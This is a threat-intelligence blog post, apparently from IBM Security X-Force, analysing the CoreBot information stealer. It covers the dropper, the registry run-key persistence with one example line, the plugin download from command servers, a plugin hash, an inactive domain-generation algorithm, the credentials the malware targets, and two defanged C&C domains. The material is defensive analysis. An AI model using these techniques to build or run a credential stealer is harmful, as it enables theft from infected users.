When it comes to discovering new malware, it is much more common for researchers to run across information stealers, ransomware and remote-access tools (RATs) than it is to encounter brand new complex codes like banking Trojans or targeted attack tools such as Duqu.

Nonetheless, it is the lesser breeds, like information stealers and RATs, that are a lot more prolific in the wild. And while banking Trojans or targeted attacks are quite specific in what they do, information stealers are by far less discriminatory and thus end up affecting a greater number of people and organizations.

That brings us to CoreBot, a new information stealer discovered and analyzed by IBM Security X-Force researchers, who indicate this is one malware piece to watch out for. CoreBot appears to be quite modular, which means that its structure and internal makeup were programmed in a way that allows for the easy adding of new data theft and endpoint control mechanisms.

CoreBot was discovered while the researchers were studying the activity of malware on Trusteer-protected enterprise endpoints. The malware’s compiled file was named “core” by its developer. Antivirus engines do not specify this malware’s name yet and detect it under generic names such as Dynamer!ac or Eldorado. But while CoreBot may appear artless at first glance, without real-time theft capabilities, it is more interesting on the inside.

Stay ahead of threats with global threat intelligence and automated protection

Info Stealers: Prevalence and Risk Factors

When it comes to generic malware, many believe it is less targeted and therefore less damaging than more elaborate malcode. In reality, the opposite is true. Generic malware is frequently the sort of Trojan that harvests passwords indiscriminately, which ends up compromising a broader set of the user’s personal accounts, including bank account credentials, email and e-wallets. When they land on an enterprise endpoint, information stealers gather email credentials, software keys and anything else saved on that drive that can be interesting to attackers. On top of that, it can download and execute other malware at will.

Many times, infostealer Trojan botnets siphon this sort of data from a myriad of endpoints and trade it in the underground, selling it to cybercriminals who will find ways to use or monetize it.

In a recent report released by IBM Security about enterprise threats, data collected from Trusteer Apex Advanced Malware Protection showed that the most rampant type of malware targeting employee endpoints in July 2015 was info stealers.

CoreBot Infiltrates PCs via Dropper

To begin, CoreBot infiltrates new endpoints by means of a dropper. Once the dropper is executed, it launches a svchost process in order to write the malware file to disk and then launch it. The dropper then exits.

Sets Persistence

Next, CoreBot generates a globally unique identifier (GUID) using the CoCreateGuid API Call. The GUID is used by CoreBot to define its persistence via a run key in the Windows Registry. For example:

RegSetValue HKCU\Software\Microsoft\Windows\CurrentVersion\Run\f9111abc-8f81-200b-8b4a-bd8fd4a43b8h

Scroll to view full table

Modular Plugin System

CoreBot’s most interesting facility is its plugin system, enabling it to be modular and easily supplemented with new theft capabilities. CoreBot downloads plugins from its command-and-control (C&C) server right after setting its persistence mechanism on the endpoint. It then loads the plugins using the plugininit export function in the plugin’s DLL.

At present, the main plugin is called Stealer. The MD5 of that plugin is:

ce890607d0f0581a1afc9b3a8f6e012d

Scroll to view full table

CoreBot steals passwords, but it is currently incapable of intercepting real-time data from Web browsers. Instead, it steals saved passwords stored in the endpoint’s browsers, scanning for passwords on all the most popular browsers.

CoreBot further searches an extensive list of FTP clients, mail clients, webmail accounts, cryptocurrency wallets, private certificates and personal data from a list of various desktop applications.

The example below shows how CoreBot scans for private certificates in store and then steals them:

Domain Generation Algorithm (DGA)

Unlike most information stealers, CoreBot has a domain generation algorithm (DGA) in place, although it is not presently activated. The DGA is a feature designed to enable malware botnets to communicate with their central C&C through dynamically generated domain names. With the DGA, the domain name is supposed to only be known in advance to the malware’s operator, thus preventing security researchers from being able to take down the site or for other criminals to hijack the botnet.

In CoreBot’s case, the DGA parameters appear to generate different domains for geographical zones of the botnet and for groups of bots defined by the botmaster — a rather interesting concept for malware that is merely a generic stealer.

Upon infection of a new endpoint, CoreBot calls home with a live signal and downloads the Stealer plugin. The malware communicates with two domains: vincenzo-sorelli[.]com and arijoputane[.]com.

Both of CoreBot’s communication domains were registered by the same person, email address and Russia-based physical address. A WHOIS lookup brings up personal details.

The Risks of CoreBot Malware for Organizations

Password and Data Collection

On infected employee endpoints, malware such as CoreBot can harvest access credentials to a plethora of resources used by the employee for work and for personal browsing. Since corporate passwords are all too often reused on other websites, fraudsters can attempt to use the stolen credentials to infiltrate the organization, send malware to other users and expand the overall compromise.

It is important to keep in mind that Trojan operators will typically exfiltrate confidential business data like customer information, budget plans or even confidential insider information. Therefore, even a few infected endpoints inside the organization can end in very significant data security consequences.

Download and Launch Other Malware

Using Windows PowerShell, Microsoft’s task automation and configuration management framework, CoreBot can fetch other malware from the Internet, download and execute it on the infected PC.

CoreBot downloads and launches new versions of the executable in order to update itself according to predefined parameters of the latest version on the infected machine.

Stop the Inevitable

Any malware on enterprise endpoints is bad news for the organization, but avoiding malware is, in reality, nearly impossible. In almost all cases of malware infiltrating employee endpoints, the malicious file was probably opened by the employee from unsolicited email or inadvertently contracted while browsing infected or watering-hole attack sites.

One of the best ways to protect enterprise endpoints is to supplement employee awareness with specialized protection that can stop malware at the exploitation or launch stages, but also stifle its data exfiltration attempts if it is already on the endpoint.

Proper detection and classification of malware like CoreBot, beyond merely generic designation, is necessary in order to properly assess the risk level it poses. Security Intelligence is writing about this because, although CoreBot isn’t very sophisticated right now, it is still new malware designed to be easily updated, and it could evolve into a more complex threat in the near future.

Learn more about Staying ahead of threats with global threat intelligence

More from Malware

Kronos Malware Reemerges with Increased Functionality

The Evolution of Kronos Malware The Kronos malware is believed to have originated from the leaked source code of the Zeus malware, which was sold on the Russian underground in 2011. Kronos continued to evolve and a new variant of Kronos emerged in 2014 and was reportedly sold on the darknet for approximately $7,000. Kronos is typically used to download other malware and has historically been used by threat actors to deliver different types of malware to victims. After remaining…

A View Into Web(View) Attacks in Android

James Kilner contributed to the technical editing of this blog. Nethanella Messer, Segev Fogel, Or Ben Nun and Liran Tiebloom contributed to the blog. Although in the PC realm it is common to see financial malware used in web attacks to commit fraud, in Android-based financial malware this is a new trend. Traditionally, financial malware in Android uses overlay techniques to steal victims’ credentials. In 2022, IBM Security Trusteer researchers discovered a new trend in financial mobile malware that targets…

RansomExx Upgrades to Rust

IBM Security X-Force Threat Researchers have discovered a new variant of the RansomExx ransomware that has been rewritten in the Rust programming language, joining a growing trend of ransomware developers switching to the language. Malware written in Rust often benefits from lower AV detection rates (compared to those written in more common languages) and this may have been the primary reason to use the language. For example, the sample analyzed in this report was not detected as malicious in the…

Raspberry Robin and Dridex: Two Birds of a Feather

IBM Security Managed Detection and Response (MDR) observations coupled with IBM Security X-Force malware research sheds additional light on the mysterious objectives of the operators behind the Raspberry Robin worm. Based on a comparative analysis between a downloaded Raspberry Robin DLL and a Dridex malware loader, the results show that they are similar in structure and functionality. Thus, IBM Security research draws another link between the Raspberry Robin infections and the Russia-based cybercriminal group 'Evil Corp,' which is the same…